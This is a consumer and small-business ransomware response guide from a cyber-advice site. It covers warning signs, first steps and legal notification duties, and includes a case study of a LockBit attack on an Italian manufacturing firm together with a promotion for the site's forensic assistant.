LEGALAUDIT
Cyber Coach

Ransomware

Ransomware: victim playbook for consumers and SMEs

Files are encrypted, a README has English instructions. What to do in the first 60 minutes and the next 72 hours.

15 min readExpert

Red flags to recognize

  • Files with new extensions (.locked, .encrypted, .lockbit, .akira, .blackcat)
  • README in every folder with Bitcoin or Monero payment instructions
  • Wallpaper changed with a countdown
  • Network backups inaccessible (modern ransomware encrypts connected backups too)
  • Windows Defender and Volume Shadow Copies disabled
  • Tor site of the group threatening to publish exfiltrated data (double extortion)
  • Lateral movement: multiple workstations encrypted at the same time

What to do now

  • Disconnect infected devices from the network (cable + Wi-Fi off) but do not power them off
  • DO NOT pay the ransom: you finance criminals and often will not recover data
  • Check No More Ransom: free decryptors exist for many strains
  • Preserve volatile memory and logs: vital for forensics and attribution
  • Contact your national CSIRT
  • Notify the privacy authority within 72h if personal data is involved (GDPR)
  • Notify clients and suppliers per contractual obligations
  • Restore from a clean offline backup after full remediation

Real case

LockBit ransomware on manufacturing SME, Emilia 2025

A metalworking SME in Modena with 42 employees wakes on Monday morning with 78 encrypted PCs. The English README demands 320,000 USD in Bitcoin in 72 hours, otherwise 240GB of exfiltrated data will be posted on the LockBit Tor site.

The CEO does not pay. He activates the CSIRT, notifies the privacy authority and recalls clients. Mythos analyses an endpoint forensic image: entry point an exposed RDP without MFA, credentials taken from a 2023 breach never changed. Lateral movement with BloodHound, exfiltration via Rclone to a Mega account.

The SME restores production in 14 days from offline backup. The exfiltrated data is published anyway. Mythos generated the dossier for the criminal complaint, GDPR notification support, and technical reconstruction for the lawsuit against IT vendors responsible for backups. No More Ransom confirmed no decryptor is available for the variant used.

What Mythos can do on this case

  • Ransomware-strain identification from encrypted files and README
  • Decryptor availability check on No More Ransom
  • Entry-point analysis (RDP, phishing, vulnerabilities)
  • Lateral movement and exfiltration reconstruction
  • Dossier for CSIRT/privacy-authority notification and insurance claim
  • Forensic chain of custody for potential civil/criminal action

Next steps

Talk to Mythos nowCheck decryptors on No More Ransom